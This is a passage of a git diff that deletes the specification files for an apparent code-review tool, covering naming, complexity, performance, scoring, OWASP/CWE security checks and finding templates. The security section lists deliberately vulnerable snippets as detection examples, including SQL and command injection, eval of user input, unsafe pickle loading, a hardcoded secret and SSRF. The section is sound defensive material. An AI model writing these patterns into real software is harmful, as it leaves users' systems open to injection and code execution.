- FIX-CHECKLIST.md (actionable checklist)
|
||||
- summary.json (machine-readable summary)
|
||||
- All files in .code-review/ directory
|
||||
```
|
||||
|
||||
## Validation
|
||||
|
||||
- ✅ All findings consolidated
|
||||
- ✅ Scores calculated
|
||||
- ✅ Action plan generated
|
||||
- ✅ Reports saved to .code-review/
|
||||
- ✅ User notified of completion
|
||||
|
||||
## Completion
|
||||
|
||||
Code review complete! Outputs available in `.code-review/` directory.
|
||||
@@ -1,346 +0,0 @@
|
||||
# Best Practices Requirements Specification
|
||||
|
||||
## Code Quality Standards
|
||||
|
||||
### Naming Conventions
|
||||
|
||||
**TypeScript/JavaScript**:
|
||||
- Classes/Interfaces: PascalCase (`UserService`, `IUserRepository`)
|
||||
- Functions/Methods: camelCase (`getUserById`, `validateEmail`)
|
||||
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`, `API_BASE_URL`)
|
||||
- Private properties: prefix with `_` or `#` (`_cache`, `#secretKey`)
|
||||
|
||||
**Python**:
|
||||
- Classes: PascalCase (`UserService`, `DatabaseConnection`)
|
||||
- Functions: snake_case (`get_user_by_id`, `validate_email`)
|
||||
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`)
|
||||
- Private: prefix with `_` (`_internal_cache`)
|
||||
|
||||
**Java**:
|
||||
- Classes/Interfaces: PascalCase (`UserService`, `IUserRepository`)
|
||||
- Methods: camelCase (`getUserById`, `validateEmail`)
|
||||
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`)
|
||||
- Packages: lowercase (`com.example.service`)
|
||||
|
||||
### Function Complexity
|
||||
|
||||
**Cyclomatic Complexity Thresholds**:
|
||||
- **Low**: 1-5 (simple functions, easy to test)
|
||||
- **Medium**: 6-10 (acceptable, well-structured)
|
||||
- **High**: 11-20 (needs refactoring)
|
||||
- **Very High**: 21+ (critical, must refactor)
|
||||
|
||||
**Calculation**:
|
||||
```
|
||||
Complexity = 1 (base)
|
||||
+ count(if)
|
||||
+ count(else if)
|
||||
+ count(while)
|
||||
+ count(for)
|
||||
+ count(case)
|
||||
+ count(catch)
|
||||
+ count(&&)
|
||||
+ count(||)
|
||||
+ count(? :)
|
||||
```
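A minimal sketch of that calculation as a token-counting heuristic (not a real parser; the `if` pattern also covers `else if`, and the ternary match is approximate):

```typescript
function estimateComplexity(source: string): number {
  const decisionPoints = [
    /\bif\s*\(/g, /\bwhile\s*\(/g, /\bfor\s*\(/g,
    /\bcase\s+/g, /\bcatch\s*\(/g, /&&/g, /\|\|/g,
    /\?[^.?:]/g, // rough ternary match; skips ?. ?? and ?:
  ];
  return decisionPoints.reduce(
    (total, pattern) => total + (source.match(pattern) ?? []).length,
    1, // base complexity
  );
}
```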
|
||||
|
||||
### Code Duplication
|
||||
|
||||
**Thresholds**:
|
||||
- **Acceptable**: < 3% duplication
|
||||
- **Warning**: 3-5% duplication
|
||||
- **Critical**: > 5% duplication
|
||||
|
||||
**Detection**:
|
||||
- Minimum block size: 5 lines
|
||||
- Similarity threshold: 85%
|
||||
- Ignore: Comments, imports, trivial getters/setters
|
||||
|
||||
### Dead Code Detection
|
||||
|
||||
**Targets**:
|
||||
- Unused imports
|
||||
- Unused variables/functions (not exported)
|
||||
- Unreachable code (after return/throw)
|
||||
- Commented-out code blocks (> 5 lines)
|
||||
|
||||
## Performance Standards
|
||||
|
||||
### N+1 Query Prevention
|
||||
|
||||
**Anti-patterns**:
|
||||
```javascript
|
||||
// ❌ N+1 Query
|
||||
for (const order of orders) {
|
||||
const user = await User.findById(order.userId);
|
||||
}
|
||||
|
||||
// ✅ Batch Query
|
||||
const userIds = orders.map(o => o.userId);
|
||||
const users = await User.findByIds(userIds);
|
||||
```
|
||||
|
||||
### Algorithm Efficiency
|
||||
|
||||
**Common Issues**:
|
||||
- Nested loops (O(n²)) when O(n) possible
|
||||
- Array.indexOf in loop → use Set.has()
|
||||
- Array.filter().length → use Array.some()
|
||||
- Multiple array iterations → combine into one pass
|
||||
|
||||
**Acceptable Complexity**:
|
||||
- **O(1)**: Ideal for lookups
|
||||
- **O(log n)**: Good for search
|
||||
- **O(n)**: Acceptable for linear scan
|
||||
- **O(n log n)**: Acceptable for sorting
|
||||
- **O(n²)**: Avoid if possible, document if necessary
|
||||
|
||||
### Memory Leak Prevention
|
||||
|
||||
**Common Issues**:
|
||||
- Event listeners without cleanup
|
||||
- setInterval without clearInterval
|
||||
- Global variable accumulation
|
||||
- Circular references
|
||||
- Large array/object allocations
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// ❌ Memory Leak
|
||||
element.addEventListener('click', handler);
|
||||
// No cleanup
|
||||
|
||||
// ✅ Proper Cleanup
|
||||
useEffect(() => {
|
||||
element.addEventListener('click', handler);
|
||||
return () => element.removeEventListener('click', handler);
|
||||
}, []);
|
||||
```
|
||||
|
||||
### Resource Cleanup
|
||||
|
||||
**Required Cleanup**:
|
||||
- Database connections
|
||||
- File handles
|
||||
- Network sockets
|
||||
- Timers (setTimeout, setInterval)
|
||||
- Event listeners
|
||||
|
||||
## Maintainability Standards
|
||||
|
||||
### Documentation Requirements
|
||||
|
||||
**Required for**:
|
||||
- All exported functions/classes
|
||||
- Public APIs
|
||||
- Complex algorithms
|
||||
- Non-obvious business logic
|
||||
|
||||
**JSDoc Format**:
|
||||
```javascript
|
||||
/**
|
||||
* Validates user credentials and generates JWT token
|
||||
*
|
||||
* @param {string} username - User's username or email
|
||||
* @param {string} password - Plain text password
|
||||
* @returns {Promise<{token: string, expiresAt: Date}>} JWT token and expiration
|
||||
* @throws {AuthenticationError} If credentials are invalid
|
||||
*
|
||||
* @example
|
||||
* const {token} = await authenticateUser('john@example.com', 'secret123');
|
||||
*/
|
||||
async function authenticateUser(username, password) {
|
||||
// ...
|
||||
}
|
||||
```
|
||||
|
||||
**Coverage Targets**:
|
||||
- Critical modules: 100%
|
||||
- High priority: 90%
|
||||
- Medium priority: 70%
|
||||
- Low priority: 50%
|
||||
|
||||
### Test Coverage Requirements
|
||||
|
||||
**Coverage Targets**:
|
||||
- Unit tests: 80% line coverage
|
||||
- Integration tests: Key workflows covered
|
||||
- E2E tests: Critical user paths covered
|
||||
|
||||
**Required Tests**:
|
||||
- All exported functions
|
||||
- All public methods
|
||||
- Error handling paths
|
||||
- Edge cases
|
||||
|
||||
**Test File Convention**:
|
||||
```
|
||||
src/auth/login.ts
|
||||
→ src/auth/login.test.ts (unit)
|
||||
→ src/auth/login.integration.test.ts (integration)
|
||||
```
|
||||
|
||||
### Dependency Management
|
||||
|
||||
**Best Practices**:
|
||||
- Pin major versions (`"^1.2.3"` not `"*"`)
|
||||
- Avoid 0.x versions in production
|
||||
- Regular security audits (npm audit, snyk)
|
||||
- Keep dependencies up-to-date
|
||||
- Minimize dependency count
|
||||
|
||||
**Version Pinning**:
|
||||
```json
|
||||
{
|
||||
"dependencies": {
|
||||
"express": "^4.18.0", // ✅ Pinned major version
|
||||
"lodash": "*", // ❌ Wildcard
|
||||
"legacy-lib": "^0.5.0" // ⚠️ Unstable 0.x
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Magic Numbers
|
||||
|
||||
**Definition**: Numeric literals without clear meaning
|
||||
|
||||
**Anti-patterns**:
|
||||
```javascript
|
||||
// ❌ Magic numbers
|
||||
if (user.age > 18) { }
|
||||
setTimeout(() => {}, 5000);
|
||||
buffer = new Array(1048576);
|
||||
|
||||
// ✅ Named constants
|
||||
const LEGAL_AGE = 18;
|
||||
const RETRY_DELAY_MS = 5000;
|
||||
const BUFFER_SIZE_1MB = 1024 * 1024;
|
||||
|
||||
if (user.age > LEGAL_AGE) { }
|
||||
setTimeout(() => {}, RETRY_DELAY_MS);
|
||||
buffer = new Array(BUFFER_SIZE_1MB);
|
||||
```
|
||||
|
||||
**Exceptions** (acceptable magic numbers):
|
||||
- 0, 1, -1 (common values)
|
||||
- 100, 1000 (obvious scaling factors in context)
|
||||
- HTTP status codes (200, 404, 500)
|
||||
|
||||
## Error Handling Standards
|
||||
|
||||
### Required Error Handling
|
||||
|
||||
**Categories**:
|
||||
- Network errors (timeout, connection failure)
|
||||
- Database errors (query failure, constraint violation)
|
||||
- Validation errors (invalid input)
|
||||
- Authentication/Authorization errors
|
||||
|
||||
**Anti-patterns**:
|
||||
```javascript
|
||||
// ❌ Silent failure
|
||||
try {
|
||||
await saveUser(user);
|
||||
} catch (err) {
|
||||
// Empty catch
|
||||
}
|
||||
|
||||
// ❌ Generic catch
|
||||
try {
|
||||
await processPayment(order);
|
||||
} catch (err) {
|
||||
console.log('Error'); // No details
|
||||
}
|
||||
|
||||
// ✅ Proper handling
|
||||
try {
|
||||
await processPayment(order);
|
||||
} catch (err) {
|
||||
logger.error('Payment processing failed', { orderId: order.id, error: err });
|
||||
throw new PaymentError('Failed to process payment', { cause: err });
|
||||
}
|
||||
```
|
||||
|
||||
### Logging Standards
|
||||
|
||||
**Required Logs**:
|
||||
- Authentication attempts (success/failure)
|
||||
- Authorization failures
|
||||
- Data modifications (create/update/delete)
|
||||
- External API calls
|
||||
- Errors and exceptions
|
||||
|
||||
**Log Levels**:
|
||||
- **ERROR**: System errors, exceptions
|
||||
- **WARN**: Recoverable issues, deprecations
|
||||
- **INFO**: Business events, state changes
|
||||
- **DEBUG**: Detailed troubleshooting info
|
||||
|
||||
**Sensitive Data**:
|
||||
- Never log: passwords, tokens, credit cards, SSNs
|
||||
- Hash/mask: emails, IPs, usernames (in production)
|
||||
|
||||
## Code Structure Standards
|
||||
|
||||
### File Organization
|
||||
|
||||
**Max File Size**: 300 lines (excluding tests)
|
||||
**Max Function Size**: 50 lines
|
||||
|
||||
**Module Structure**:
|
||||
```
|
||||
module/
|
||||
├── index.ts # Public exports
|
||||
├── types.ts # Type definitions
|
||||
├── constants.ts # Constants
|
||||
├── utils.ts # Utilities
|
||||
├── service.ts # Business logic
|
||||
└── service.test.ts # Tests
|
||||
```
|
||||
|
||||
### Import Organization
|
||||
|
||||
**Order**:
|
||||
1. External dependencies
|
||||
2. Internal modules (absolute imports)
|
||||
3. Relative imports
|
||||
4. Type imports (TypeScript)
|
||||
|
||||
```typescript
|
||||
// ✅ Organized imports
|
||||
import express from 'express';
|
||||
import { Logger } from 'winston';
|
||||
|
||||
import { UserService } from '@/services/user';
|
||||
import { config } from '@/config';
|
||||
|
||||
import { validateEmail } from './utils';
|
||||
import { UserRepository } from './repository';
|
||||
|
||||
import type { User, UserCreateInput } from './types';
|
||||
```
|
||||
|
||||
## Scoring System
|
||||
|
||||
### Overall Score Calculation
|
||||
|
||||
```
|
||||
Overall Score = (
|
||||
Security Score × 0.4 +
|
||||
Code Quality Score × 0.25 +
|
||||
Performance Score × 0.2 +
|
||||
Maintainability Score × 0.15
|
||||
)
|
||||
|
||||
Security = 100 - (Critical × 30 + High × 2 + Medium × 0.5)
|
||||
Code Quality = 100 - (violations / total_checks × 100)
|
||||
Performance = 100 - (issues / potential_issues × 100)
|
||||
Maintainability = (doc_coverage × 0.4 + test_coverage × 0.4 + dependency_health × 0.2)
|
||||
```
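A minimal sketch transcribing these formulas into code; clamping the security score at zero is an added assumption, and the risk thresholds follow the list below:

```typescript
interface Scores {
  security: number;
  codeQuality: number;
  performance: number;
  maintainability: number;
}

function overallScore(s: Scores): number {
  return (
    s.security * 0.4 +
    s.codeQuality * 0.25 +
    s.performance * 0.2 +
    s.maintainability * 0.15
  );
}

function securityScore(critical: number, high: number, medium: number): number {
  // Clamped at 0 (assumption; the raw formula can go negative).
  return Math.max(0, 100 - (critical * 30 + high * 2 + medium * 0.5));
}

function riskLevel(score: number): 'LOW' | 'MEDIUM' | 'HIGH' | 'CRITICAL' {
  if (score >= 90) return 'LOW';
  if (score >= 70) return 'MEDIUM';
  if (score >= 50) return 'HIGH';
  return 'CRITICAL';
}
```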
|
||||
|
||||
### Risk Levels
|
||||
|
||||
- **LOW**: Score 90-100
|
||||
- **MEDIUM**: Score 70-89
|
||||
- **HIGH**: Score 50-69
|
||||
- **CRITICAL**: Score < 50
|
||||
@@ -1,252 +0,0 @@
|
||||
# Quality Standards
|
||||
|
||||
## Overall Quality Metrics
|
||||
|
||||
### Quality Score Formula
|
||||
|
||||
```
|
||||
Overall Quality = (
|
||||
Correctness × 0.30 +
|
||||
Security × 0.25 +
|
||||
Maintainability × 0.20 +
|
||||
Performance × 0.15 +
|
||||
Documentation × 0.10
|
||||
)
|
||||
```
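A minimal sketch of the weighted formula, with the grade bands taken from the table below:

```typescript
interface QualityComponents {
  correctness: number;
  security: number;
  maintainability: number;
  performance: number;
  documentation: number;
}

function overallQuality(c: QualityComponents): number {
  return (
    c.correctness * 0.3 +
    c.security * 0.25 +
    c.maintainability * 0.2 +
    c.performance * 0.15 +
    c.documentation * 0.1
  );
}

function grade(score: number): 'A' | 'B' | 'C' | 'D' | 'F' {
  if (score >= 90) return 'A';
  if (score >= 80) return 'B';
  if (score >= 70) return 'C';
  if (score >= 60) return 'D';
  return 'F';
}
```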
|
||||
|
||||
### Score Ranges
|
||||
|
||||
| Range | Grade | Description |
|
||||
|-------|-------|-------------|
|
||||
| 90-100 | A | Excellent - Production ready |
|
||||
| 80-89 | B | Good - Minor improvements needed |
|
||||
| 70-79 | C | Acceptable - Some issues to address |
|
||||
| 60-69 | D | Poor - Significant improvements required |
|
||||
| 0-59 | F | Failing - Major issues, not production ready |
|
||||
|
||||
## Review Completeness
|
||||
|
||||
### Mandatory Checks
|
||||
|
||||
**Security**:
|
||||
- ✅ OWASP Top 10 coverage
|
||||
- ✅ CWE Top 25 coverage
|
||||
- ✅ Language-specific security patterns
|
||||
- ✅ Dependency vulnerability scan
|
||||
|
||||
**Code Quality**:
|
||||
- ✅ Naming convention compliance
|
||||
- ✅ Complexity analysis
|
||||
- ✅ Code duplication detection
|
||||
- ✅ Dead code identification
|
||||
|
||||
**Performance**:
|
||||
- ✅ N+1 query detection
|
||||
- ✅ Algorithm efficiency check
|
||||
- ✅ Memory leak detection
|
||||
- ✅ Resource cleanup verification
|
||||
|
||||
**Maintainability**:
|
||||
- ✅ Documentation coverage
|
||||
- ✅ Test coverage analysis
|
||||
- ✅ Dependency health check
|
||||
- ✅ Error handling review
|
||||
|
||||
## Reporting Standards
|
||||
|
||||
### Finding Requirements
|
||||
|
||||
Each finding must include:
|
||||
- **Unique ID**: SEC-001, BP-001, etc.
|
||||
- **Type**: Specific issue type (sql-injection, high-complexity, etc.)
|
||||
- **Severity**: Critical, High, Medium, Low
|
||||
- **Location**: File path and line number
|
||||
- **Code Snippet**: Vulnerable/problematic code
|
||||
- **Message**: Clear description of the issue
|
||||
- **Recommendation**: Specific fix guidance
|
||||
- **Example**: Before/after code example
|
||||
|
||||
### Report Structure
|
||||
|
||||
**Executive Summary**:
|
||||
- High-level overview
|
||||
- Risk assessment
|
||||
- Key statistics
|
||||
- Compliance status
|
||||
|
||||
**Detailed Findings**:
|
||||
- Organized by severity
|
||||
- Grouped by category
|
||||
- Full details for each finding
|
||||
|
||||
**Action Plan**:
|
||||
- Prioritized fix list
|
||||
- Effort estimates
|
||||
- Timeline recommendations
|
||||
|
||||
**Metrics Dashboard**:
|
||||
- Quality scores
|
||||
- Trend analysis (if historical data)
|
||||
- Compliance status
|
||||
|
||||
**Appendix**:
|
||||
- Full findings list
|
||||
- Configuration details
|
||||
- Tool versions
|
||||
- References
|
||||
|
||||
## Output File Standards
|
||||
|
||||
### File Naming
|
||||
|
||||
```
|
||||
.code-review/
|
||||
├── inventory.json # File inventory
|
||||
├── security-findings.json # Security findings
|
||||
├── best-practices-findings.json # Best practices findings
|
||||
├── summary.json # Summary statistics
|
||||
├── REPORT.md # Main report
|
||||
├── FIX-CHECKLIST.md # Action checklist
|
||||
└── state.json # Session state
|
||||
```
|
||||
|
||||
### JSON Schema
|
||||
|
||||
**Finding Schema**:
|
||||
```json
|
||||
{
|
||||
"id": "string",
|
||||
"type": "string",
|
||||
"category": "security|code_quality|performance|maintainability",
|
||||
"severity": "critical|high|medium|low",
|
||||
"file": "string",
|
||||
"line": "number",
|
||||
"column": "number",
|
||||
"code": "string",
|
||||
"message": "string",
|
||||
"recommendation": {
|
||||
"description": "string",
|
||||
"fix_example": "string"
|
||||
},
|
||||
"references": ["string"],
|
||||
"cwe": "string (optional)",
|
||||
"owasp": "string (optional)"
|
||||
}
|
||||
```
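The same schema expressed as a TypeScript interface (a sketch; the optional `cwe`/`owasp` fields follow the schema above):

```typescript
interface Finding {
  id: string;
  type: string;
  category: 'security' | 'code_quality' | 'performance' | 'maintainability';
  severity: 'critical' | 'high' | 'medium' | 'low';
  file: string;
  line: number;
  column: number;
  code: string;
  message: string;
  recommendation: {
    description: string;
    fix_example: string;
  };
  references: string[];
  cwe?: string;
  owasp?: string;
}
```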
|
||||
|
||||
## Validation Requirements
|
||||
|
||||
### Phase Completion Criteria
|
||||
|
||||
**Phase 1 (Code Discovery)**:
|
||||
- ✅ At least 1 file discovered
|
||||
- ✅ Files categorized by priority
|
||||
- ✅ Metadata extracted
|
||||
- ✅ Inventory JSON created
|
||||
|
||||
**Phase 2 (Security Analysis)**:
|
||||
- ✅ All critical/high priority files analyzed
|
||||
- ✅ Findings have severity classification
|
||||
- ✅ CWE/OWASP mappings included
|
||||
- ✅ Fix recommendations provided
|
||||
|
||||
**Phase 3 (Best Practices)**:
|
||||
- ✅ Code quality checks completed
|
||||
- ✅ Performance analysis done
|
||||
- ✅ Maintainability assessed
|
||||
- ✅ Recommendations provided
|
||||
|
||||
**Phase 4 (Report Generation)**:
|
||||
- ✅ All findings consolidated
|
||||
- ✅ Scores calculated
|
||||
- ✅ Reports generated
|
||||
- ✅ Checklist created
|
||||
|
||||
## Skill Execution Standards
|
||||
|
||||
### Performance Targets
|
||||
|
||||
- **Phase 1**: < 30 seconds per 1000 files
|
||||
- **Phase 2**: < 60 seconds per 100 files (security)
|
||||
- **Phase 3**: < 60 seconds per 100 files (best practices)
|
||||
- **Phase 4**: < 10 seconds (report generation)
|
||||
|
||||
### Resource Limits
|
||||
|
||||
- **Memory**: < 2GB for projects with 1000+ files
|
||||
- **CPU**: Efficient pattern matching (minimize regex complexity)
|
||||
- **Disk**: Use streaming for large files (> 10MB)
|
||||
|
||||
### Error Handling
|
||||
|
||||
**Graceful Degradation**:
|
||||
- If tool unavailable: Skip check, note in report
|
||||
- If file unreadable: Log warning, continue with others
|
||||
- If analysis fails: Report error, continue with next file
|
||||
|
||||
**User Notification**:
|
||||
- Progress updates every 10% completion
|
||||
- Clear error messages with troubleshooting steps
|
||||
- Final summary with metrics and file locations
|
||||
|
||||
## Integration Standards
|
||||
|
||||
### Git Integration
|
||||
|
||||
**Pre-commit Hook**:
|
||||
```bash
|
||||
#!/bin/bash
|
||||
ccw run code-reviewer --scope staged --severity critical,high
|
||||
exit $? # Block commit if critical/high issues found
|
||||
```
|
||||
|
||||
**PR Comments**:
|
||||
- Automatic review comments on changed lines
|
||||
- Summary comment with overall findings
|
||||
- Status check (pass/fail based on threshold)
|
||||
|
||||
### CI/CD Integration
|
||||
|
||||
**Requirements**:
|
||||
- Exit code 0 if no critical/high issues
|
||||
- Exit code 1 if blocking issues found
|
||||
- JSON output for parsing
|
||||
- Configurable severity threshold
|
||||
|
||||
### IDE Integration
|
||||
|
||||
**LSP Support** (future):
|
||||
- Real-time security/quality feedback
|
||||
- Inline fix suggestions
|
||||
- Quick actions for common fixes
|
||||
|
||||
## Compliance Mapping
|
||||
|
||||
### Supported Standards
|
||||
|
||||
**PCI DSS**:
|
||||
- Requirement 6.5: Common coding vulnerabilities
|
||||
- Map findings to specific requirements
|
||||
|
||||
**HIPAA**:
|
||||
- Technical safeguards
|
||||
- Map data exposure findings
|
||||
|
||||
**GDPR**:
|
||||
- Data protection by design
|
||||
- Map sensitive data handling
|
||||
|
||||
**SOC 2**:
|
||||
- Security controls
|
||||
- Map access control findings
|
||||
|
||||
### Compliance Reports
|
||||
|
||||
Generate compliance-specific reports:
|
||||
```
|
||||
.code-review/compliance/
|
||||
├── pci-dss-report.md
|
||||
├── hipaa-report.md
|
||||
├── gdpr-report.md
|
||||
└── soc2-report.md
|
||||
```
|
||||
@@ -1,243 +0,0 @@
|
||||
# Security Requirements Specification
|
||||
|
||||
## OWASP Top 10 Coverage
|
||||
|
||||
### A01:2021 - Broken Access Control
|
||||
|
||||
**Checks**:
|
||||
- Missing authorization checks on protected routes
|
||||
- Insecure direct object references (IDOR)
|
||||
- Path traversal vulnerabilities
|
||||
- Missing CSRF protection
|
||||
- Elevation of privilege
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Missing auth middleware
|
||||
router.get('/admin/*', handler); // ❌ No auth check
|
||||
|
||||
// Insecure direct object reference
|
||||
router.get('/user/:id', async (req, res) => {
|
||||
const user = await User.findById(req.params.id); // ❌ No ownership check
|
||||
res.json(user);
|
||||
});
|
||||
```
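For contrast, a minimal corrected version of the second route above, assuming an Express-style `requireAuth` middleware and an `isAdmin` flag on the authenticated user (both hypothetical):

```typescript
// ✅ Auth middleware plus an ownership check before returning the record
router.get('/user/:id', requireAuth, async (req, res) => {
  if (req.user.id !== req.params.id && !req.user.isAdmin) {
    return res.status(403).json({ error: 'Forbidden' });
  }
  const user = await User.findById(req.params.id);
  res.json(user);
});
```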
|
||||
|
||||
### A02:2021 - Cryptographic Failures
|
||||
|
||||
**Checks**:
|
||||
- Sensitive data transmitted without encryption
|
||||
- Weak cryptographic algorithms (MD5, SHA1)
|
||||
- Hardcoded secrets/keys
|
||||
- Insecure random number generation
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Weak hashing
|
||||
const hash = crypto.createHash('md5').update(password); // ❌ MD5 is weak
|
||||
|
||||
// Hardcoded secret
|
||||
const token = jwt.sign(payload, 'secret123'); // ❌ Hardcoded secret
|
||||
```
|
||||
|
||||
### A03:2021 - Injection
|
||||
|
||||
**Checks**:
|
||||
- SQL injection
|
||||
- NoSQL injection
|
||||
- Command injection
|
||||
- LDAP injection
|
||||
- XPath injection
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// SQL injection
|
||||
const query = `SELECT * FROM users WHERE id = ${userId}`; // ❌
|
||||
|
||||
// Command injection
|
||||
exec(`git clone ${userRepo}`); // ❌
|
||||
```
|
||||
|
||||
### A04:2021 - Insecure Design
|
||||
|
||||
**Checks**:
|
||||
- Missing rate limiting
|
||||
- Lack of input validation
|
||||
- Business logic flaws
|
||||
- Missing security requirements
|
||||
|
||||
### A05:2021 - Security Misconfiguration
|
||||
|
||||
**Checks**:
|
||||
- Default credentials
|
||||
- Overly permissive CORS
|
||||
- Verbose error messages
|
||||
- Unnecessary features enabled
|
||||
- Missing security headers
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Overly permissive CORS
|
||||
app.use(cors({ origin: '*' })); // ❌
|
||||
|
||||
// Verbose error
|
||||
res.status(500).json({ error: err.stack }); // ❌
|
||||
```
|
||||
|
||||
### A06:2021 - Vulnerable and Outdated Components
|
||||
|
||||
**Checks**:
|
||||
- Dependencies with known vulnerabilities
|
||||
- Unmaintained dependencies
|
||||
- Using deprecated APIs
|
||||
|
||||
### A07:2021 - Identification and Authentication Failures
|
||||
|
||||
**Checks**:
|
||||
- Weak password requirements
|
||||
- No protection against brute-force attacks
|
||||
- Exposed session IDs
|
||||
- Weak JWT implementation
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Weak bcrypt rounds
|
||||
bcrypt.hash(password, 4); // ❌ Too low (min: 10)
|
||||
|
||||
// Session ID in URL
|
||||
res.redirect(`/dashboard?sessionId=${sessionId}`); // ❌
|
||||
```
|
||||
|
||||
### A08:2021 - Software and Data Integrity Failures
|
||||
|
||||
**Checks**:
|
||||
- Insecure deserialization
|
||||
- Unsigned/unverified updates
|
||||
- CI/CD pipeline vulnerabilities
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Insecure deserialization
|
||||
const obj = eval(userInput); // ❌
|
||||
|
||||
// Pickle vulnerability (Python)
|
||||
data = pickle.loads(untrusted_data) # ❌
|
||||
```
|
||||
|
||||
### A09:2021 - Security Logging and Monitoring Failures
|
||||
|
||||
**Checks**:
|
||||
- Missing audit logs
|
||||
- Sensitive data in logs
|
||||
- Insufficient monitoring
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// Password in logs
|
||||
console.log(`Login attempt: ${username}:${password}`); // ❌
|
||||
```
|
||||
|
||||
### A10:2021 - Server-Side Request Forgery (SSRF)
|
||||
|
||||
**Checks**:
|
||||
- Unvalidated URLs in requests
|
||||
- Internal network access
|
||||
- Cloud metadata exposure
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
// SSRF vulnerability
|
||||
const response = await fetch(userProvidedUrl); // ❌
|
||||
```
|
||||
|
||||
## CWE Top 25 Coverage
|
||||
|
||||
### CWE-79: Cross-site Scripting (XSS)
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
element.innerHTML = userInput; // ❌
|
||||
document.write(userInput); // ❌
|
||||
```
|
||||
|
||||
### CWE-89: SQL Injection
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
query = `SELECT * FROM users WHERE name = '${name}'`; // ❌
|
||||
```
|
||||
|
||||
### CWE-20: Improper Input Validation
|
||||
|
||||
**Checks**:
|
||||
- Missing input sanitization
|
||||
- No input length limits
|
||||
- Unvalidated file uploads
|
||||
|
||||
### CWE-78: OS Command Injection
|
||||
|
||||
**Patterns**:
|
||||
```javascript
|
||||
exec(`ping ${userInput}`); // ❌
|
||||
```
|
||||
|
||||
### CWE-190: Integer Overflow
|
||||
|
||||
**Checks**:
|
||||
- Large number operations without bounds checking
|
||||
- Array allocation with user-controlled size
|
||||
|
||||
## Language-Specific Security Rules
|
||||
|
||||
### TypeScript/JavaScript
|
||||
|
||||
- Prototype pollution
|
||||
- eval() usage
|
||||
- Unsafe regex (ReDoS)
|
||||
- require() with dynamic input
|
||||
|
||||
### Python
|
||||
|
||||
- pickle vulnerabilities
|
||||
- yaml.unsafe_load()
|
||||
- SQL injection in SQLAlchemy
|
||||
- Command injection in subprocess
|
||||
|
||||
### Java
|
||||
|
||||
- Deserialization vulnerabilities
|
||||
- XXE in XML parsers
|
||||
- Path traversal
|
||||
- SQL injection in JDBC
|
||||
|
||||
### Go
|
||||
|
||||
- Race conditions
|
||||
- SQL injection
|
||||
- Path traversal
|
||||
- Weak cryptography
|
||||
|
||||
## Severity Classification
|
||||
|
||||
### Critical
|
||||
- Remote code execution
|
||||
- SQL injection with write access
|
||||
- Authentication bypass
|
||||
- Hardcoded credentials in production
|
||||
|
||||
### High
|
||||
- XSS in sensitive contexts
|
||||
- Missing authorization checks
|
||||
- Sensitive data exposure
|
||||
- Insecure cryptography
|
||||
|
||||
### Medium
|
||||
- Missing rate limiting
|
||||
- Weak password policy
|
||||
- Security misconfiguration
|
||||
- Information disclosure
|
||||
|
||||
### Low
|
||||
- Missing security headers
|
||||
- Verbose error messages
|
||||
- Outdated dependencies (no known exploits)
|
||||
@@ -1,234 +0,0 @@
|
||||
# Best Practice Finding Template
|
||||
|
||||
Use this template for documenting code quality, performance, and maintainability issues.
|
||||
|
||||
## Finding Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "BP-{number}",
|
||||
"type": "{issue-type}",
|
||||
"category": "{code_quality|performance|maintainability}",
|
||||
"severity": "{high|medium|low}",
|
||||
"file": "{file-path}",
|
||||
"line": {line-number},
|
||||
"function": "{function-name}",
|
||||
"message": "{clear-description}",
|
||||
"recommendation": {
|
||||
"description": "{how-to-fix}",
|
||||
"example": "{corrected-code}"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Markdown Template
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-{number}] {Issue Title}
|
||||
|
||||
**File**: `{file-path}:{line}`
|
||||
**Category**: {Code Quality|Performance|Maintainability}
|
||||
|
||||
**Issue**: {Detailed explanation of the problem}
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`{language}
|
||||
{problematic-code}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`{language}
|
||||
{improved-code-with-comments}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: {Why this matters - readability, performance, maintainability}
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: High Complexity
|
||||
|
||||
```markdown
|
||||
### 🟠 [BP-001] High Cyclomatic Complexity
|
||||
|
||||
**File**: `src/utils/validator.ts:78`
|
||||
**Category**: Code Quality
|
||||
**Function**: `validateUserInput`
|
||||
**Complexity**: 15 (threshold: 10)
|
||||
|
||||
**Issue**: Function has 15 decision points, making it difficult to test and maintain.
|
||||
|
||||
**Current Code**:
|
||||
\`\`\`typescript
|
||||
function validateUserInput(input) {
|
||||
if (!input) return false;
|
||||
if (!input.email) return false;
|
||||
if (!input.email.includes('@')) return false;
|
||||
if (input.email.length > 255) return false;
|
||||
// ... 11 more conditions
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Extract validation rules
|
||||
const validationRules = {
|
||||
email: (email) => email && email.includes('@') && email.length <= 255,
|
||||
password: (pwd) => pwd && pwd.length >= 8 && /[A-Z]/.test(pwd),
|
||||
username: (name) => name && /^[a-zA-Z0-9_]+$/.test(name),
|
||||
};
|
||||
|
||||
// Simplified validator
|
||||
function validateUserInput(input) {
|
||||
return Object.entries(validationRules).every(([field, validate]) =>
|
||||
validate(input[field])
|
||||
);
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
**Impact**: Reduces complexity from 15 to 3, improves testability, and makes validation rules reusable.
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: N+1 Query
|
